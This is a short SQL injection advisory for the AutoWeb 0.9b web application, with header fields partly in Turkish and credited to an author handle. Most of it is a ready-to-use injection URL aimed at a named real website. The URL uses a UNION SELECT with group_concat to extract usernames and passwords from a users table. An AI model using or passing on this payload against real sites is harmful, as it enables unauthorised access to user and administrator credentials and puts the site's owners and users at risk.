AutoWeb version 0.9b suffers from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
b522d5365a43eec87fe471d0ae5a4872f7c25b49037d37b6ba3187ba1a13b765
< ------------------- header data start ------------------- >
#############################################################
# Application Name : AutoWeb 0.9b
# Vulnerable Type : SqL Injection
# Infection : Kullanýcý ve Yönetici Bilgileri Çekilebilir.
# Bug Fix Advice : Zararlý karakterler filtrelenmelidir.
# Author : Lazmania61
# Example : http://www.savinodelbene.hr/news.php?id=2&lang=IT&theme=savino&news=1
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
http://www.savinodelbene.hr/news.php?id=2&lang=IT&theme=savino&news=-1%20UnIOn%20SeLEct%201,group_concat%28username,0x94,password%29,3,4,5%20FrOm%20users
< -- bug code end of -- >